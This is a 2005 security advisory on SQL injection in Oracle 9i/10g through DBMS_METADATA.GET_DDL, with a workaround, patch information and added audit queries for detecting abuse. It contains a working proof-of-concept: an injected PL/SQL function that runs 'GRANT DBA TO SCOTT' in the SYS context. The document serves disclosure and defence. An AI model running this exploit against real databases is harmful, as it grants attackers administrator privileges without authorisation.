SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g
Name: SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g
Systems Affected: Oracle 9i / 10g
Severity: High Risk
Category: SQL Injection
Credit: Esteban Martinez Fayo (argeniss dot com)
Date: 18 Apr 2005 (V 1.00)
Details
The following proof-of-concept exploit code injects a custom PL/SQL function. The function is executed in the SYS context and grants the DBA role to the user SCOTT.
Workarounds
REVOKE EXECUTE ON SYS.DBMS_METADATA FROM PUBLIC FORCE;
Example
-- Create a function first and inject this function. The function will be executed as user SYS.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/
-- Inject the function in the vulnerable procedure
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACK_FUNC()||''','') FROM dual;
Patch Information
Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005.
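To confirm that the workaround has taken effect and to review the database for traces of the technique shown in the example, a DBA can run queries like the following. This is an added audit example, not part of the original advisory; it assumes a DBA-privileged session and the standard data dictionary views DBA_TAB_PRIVS, DBA_ROLE_PRIVS and DBA_SOURCE.

```sql
-- Added audit example (not from the original advisory).
-- Assumption: run as an account that can read the DBA_* dictionary views.

-- 1. Is the workaround in place?
--    Any row with GRANTEE = 'PUBLIC' means the REVOKE has not been applied.
--    Other rows show accounts or roles that can still call the package.
SELECT grantee, privilege, grantor
  FROM dba_tab_privs
 WHERE owner      = 'SYS'
   AND table_name = 'DBMS_METADATA'
   AND privilege  = 'EXECUTE'
 ORDER BY grantee;

-- 2. Who holds the DBA role?
--    Compare the result with the list of approved administrators; an
--    ordinary application or demo account here needs investigation.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- 3. Non-SYS stored code that combines an autonomous transaction with a
--    dynamic GRANT, the pattern used by the advisory's injected function.
--    Matching is done per object, so the keywords may sit on different
--    source lines. Wrapped (obfuscated) source is not covered by this check.
SELECT s.owner, s.name, s.type
  FROM dba_source s
 WHERE s.owner NOT IN ('SYS', 'SYSTEM')
 GROUP BY s.owner, s.name, s.type
HAVING MAX(CASE WHEN UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%'
                THEN 1 ELSE 0 END) = 1
   AND MAX(CASE WHEN UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'
                THEN 1 ELSE 0 END) = 1
   AND MAX(CASE WHEN UPPER(s.text) LIKE '%GRANT %'
                THEN 1 ELSE 0 END) = 1
 ORDER BY s.owner, s.name;
```

Query 3 is a heuristic and will also list legitimate administrative code, so each hit needs manual review.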
© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Definition: Exploit
An exploit is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or a denial of service (DoS) on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.